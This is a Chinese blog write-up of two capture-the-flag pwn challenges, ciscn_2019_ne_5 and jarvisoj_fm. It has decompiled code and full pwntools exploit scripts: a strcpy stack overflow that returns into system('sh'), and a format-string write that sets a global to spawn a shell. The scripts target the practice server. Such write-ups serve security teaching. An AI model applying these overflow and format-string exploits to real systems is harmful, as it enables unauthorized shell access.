BUUCTF ciscn_2019_ne_5 & jarvisoj_fm

已于 2022-11-01 01:28:37 修改
阅读量698 收藏
点赞数 1
分类专栏: Pwn 文章标签: linux 学习 python 网络安全 网络
于 2022-11-01 01:28:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127626164
版权

1.ciscn_2019_ne_5

1.1 Checksec & IDA Pro

只开起了部分RELRO与NX。

IDA中发现4个函数

 main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  char v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *p_argc; // [esp+F4h] [ebp-Ch]

  p_argc = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") ) // password = administrator
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  puts("Input your operation:");
  puts("1.Add a log.");
  puts("2.Display all logs.");
  puts("3.Print all logs.");
  printf("0.Exit\n:");
  __isoc99_scanf("%d", &v4);
  switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:
      AddLog((int)src);
      break;
    case 2:
      Display(src);
      break;
    case 3:
      Print();
      break;
    case 4:
      GetFlag(src);
      break;
    default:
      break;
  }
  sub_804892B();
  return result;
}

GetFlag

int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  char v3[60]; // [esp+4h] [ebp-44h] BYREF

  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src); // 栈溢出漏洞所在地 大小为 dest 的大小,0x48
  return printf("The flag is your log:%s\n", dest);
}

AddLog

int __cdecl AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);
}

主要只需要看这3个函数。

分析:

1.使用密码 administrator 进入下一步。

2.输入输字1,修改 src

3.输入输字4,进行栈溢出,获取shell

Payload:

payload_pass = b'administrator'
system = elf.sym['system']
main = elf.sym['main']
sh = 0x80482EA

payload = b'A' * ( 0x48 + 0x04 ) + p32(system) + p32(main) + p32(sh)

完整PoC:

from pwn import *

#io = process("/root/Desktop/PwnSubjects/ciscn_2019_ne_5")
io = remote("node4.buuoj.cn",29477)
elf = ELF("/root/Desktop/PwnSubjects/ciscn_2019_ne_5")
context.log_level = 'debug'

system = elf.sym['system']
main = elf.sym['main']
sh = 0x80482EA

payload_pass = b'administrator'
payload = b'A' * ( 0x48 + 0x04 ) + p32(system) + p32(main) + p32(sh)

io.sendline(payload_pass)
io.sendline("1")
io.sendlineafter("info:",payload)
io.sendline("4")
io.interactive()

成功获取shell。

2. jarvisoj_fm

2.1 Checksec & IDA Pro

开启了Canary,NX,部分RELRO。

main 函数 

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x50u);
  printf(buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

fmtstr_payload

由未开启PIE,获得第一种思路:

fmtstr_payload(offset,{target:target})

fmtstr_payload(偏移量,{被替换的目标:替换的目标})

构建PoC

偏移量:

AAAA-0xffbf481c[1]-0x50[2]-(nil)[3]-(nil)[4]-0xffffffff[5]-(nil)[6]-0xffbf4934[7]-0xf7f7f608[8]-0x2c[9]-0x50[10]-0x41414141[11]
[x] 代表是第几位偏移
因此是第十一位

 

from pwn import *

io = process("/root/Desktop/PwnSubjects/fm")

offset = 11
x = 0x804A02C
target = p32(4)
payload = fmtstr_payload(11,{x:target})

io.sendline(payload)
io.interactive()

成功获取shell

不使用fmtstr_payload的思路

因为要置 0x0804A02C 也就是 x 为0x4

Payload:

x = 0x804A02C

payload = p32(x)
payload2 = b'%4c%13$n'

用 %4c 输出四个字符,因为 %4c%11$n 本身占2个字符,因此是 %4c%13$n

完整PoC:

from pwn import *

#io = process("/root/Desktop/PwnSubjects/fm")
io = remote("node4.buuoj.cn","28463")

x = 0x804A02C
payload = p32(x)
payload2 = b'%4c%13$n'
io.sendline(payload2+payload)
io.interactive()

Red-Leaves
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UEFITool_NE_A51_win32.zip
12-24
5. **引导加载器配置**:UEFITool可以用于配置和管理不同的引导加载器,比如GRUB2或Windows Boot Manager,确保系统能够正确启动。 6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全...
ATOS.rar_ATOS NE_Atos
09-19
ATOS是一个专用于无线传感器网络开发的开源平台,其核心是Atos NENetwork Element),它为开发者提供了构建和管理自定义传感器应用的框架。在这个压缩包“ATOS.rar_ATOS NE_Atos”中,我们可以预见到包含有关如何...
【CTF】jarvisoj_fm 1
凉水的博客
07-06 526
jarvisoj_fm
【CTF】ciscn_2019_n_5
凉水的博客
04-22 931
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 732
[buuctf]ciscn_2019_n_5
ciscn_2019_n_5
、moddemod
06-17 302
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
ciscn_2019_ne_5
、moddemod
06-17 385
这道题如果出现不能反编译参考文章 简单说一下思路,在AddLog中添加的数据存放在src对应的栈中,在GetFlag中因为strcpy函数存在溢出,所以直接在AddLog构造payload在strcpy中溢出就直接拿到shell了! exp #!/usr/bin/env python # coding=utf-8 from pwn import * context(log_level='debug') proc_name = './ciscn_2019_ne_5' p = process(proc_
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩情况至关重要。 6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地...
opengl.rar_OPENGL NE_nehe lesson_opengl nehe
09-23
5. Lesson5:深度缓冲和隐藏面消除 - 解释如何处理视觉上的遮挡问题,使图像更加真实。 6. Lesson6:纹理映射 - 教授如何将图像贴合到3D物体表面,实现复杂的表面效果。 7. Lesson7:视口和投影 - 学习如何调整...
test_eth.rar_EMAC PHY_MC9S12NE64
09-24
《MC9S12NE64的EMAC与PHY网络收发测试详解》 在嵌入式系统领域,网络通信是不可或缺的一部分。本文将详细解析标题为“test_eth.rar_EMAC PHY_MC9S12NE64”的压缩包文件所包含的MC9S12NE64网络收发测试代码,以及...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1621
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1467
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 209
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
jarvisoj_fm
m0_52231248的博客
11-15 463
jarvisoj_fm Checksec: Ida: 很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数 偏移gdb .%p都能确定,利用方式%$n,pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp: Flag: ...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1086
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTF-pwn-ciscn_2019_ne_51
最新发布
qq_30528603的博客
11-29 142
我们看到strcpy是将src的内容复制到dest。我们前面看到src允许我们输入128个字节。而dest数组离ebp只有0x48个字节。32为程序没有canary没有PIE,应该是简单的栈溢出。程序上来是输入一个密码验证。随便输入下错误直接退出。那么我们需要构造的东西都有了,接着就是找溢出点。它会把我们的输入放入src这个数组中。主函数大致流程在此。当找不到/bin/sh的时候,可以用sh代替。这里就有一个小技巧了。
BUUCTFPWN】ciscn_2019_ne_5
m0_55368674的博客
01-15 171
BUUCTFPWN】ciscn_2019_ne_5
jarvis oj fm writeup
ditto的博客
01-05 328
格式化字符串漏洞简单利用 32位程序。 canary和nx都打开了。 放ida里: 直接打印的buf,很明显的格式化字符串漏洞。 用%n,将其修改为4即可,exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9895") payload=p32(0x0804A02C)+"%11$n" a.sendline(payload) a....
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1006
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
SIMATIC S7-300_400 梯形图编程手册:逻辑指令详解
2. **比较指令**:如EQ, NE, GT, LT等,用于比较两个数值是否相等或大小关系。 3. **转换指令**:如CONV,用于在不同数据类型之间转换。 4. **计数器指令**:如CTU, CTD, CTUD,用于计数脉冲,常用于计时和频率...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值